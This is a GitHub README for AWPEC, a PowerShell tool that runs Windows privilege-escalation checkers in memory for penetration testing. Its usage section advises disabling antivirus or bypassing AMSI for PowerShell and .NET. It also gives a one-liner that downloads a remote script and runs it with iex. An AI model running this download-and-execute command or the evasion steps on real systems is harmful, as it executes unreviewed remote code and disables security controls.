Skip to content

Latest commit

 

History

History
39 lines (28 loc) · 1.81 KB

README.md

File metadata and controls

39 lines (28 loc) · 1.81 KB

🔥 AWPEC 🔥

Automated Windows Privilege Escalation Checks

PowerShell script that automates the tedious tasks of Windows Privilege Escalation


Buy Me A Coffee

💎 Features

AWPEC runs the following privilege escalation tools in memory:

  • PowerUp
  • Seatbelt
  • PrivescCheck
  • WinPEAS

It also supports running ADRecon and auditing the results if you find yourself within an Active Directory domain context.

🎓 Usage

Since the AWPEC PowerShell script relies on various 3rd party tools, which are known for being flagged by AV, we have to either disable antivirus or actively bypass AMSI. Furthermore, as we utilize PowerSharpPack, which reflectively loads C# code, we must ensure to bypass AMSI .NET as well. A basic AMSI PS bypass is not sufficient!

So open a low-priv PowerShell terminal session, bypass AMSI (PS + .NET) and then run the PS script:

# run the AWPEC script
iex(new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Haxxnet/AWPEC/main/Invoke-AWPEC.ps1')

💎 Acknowledgment & Credits

Many thanks to the following individuals: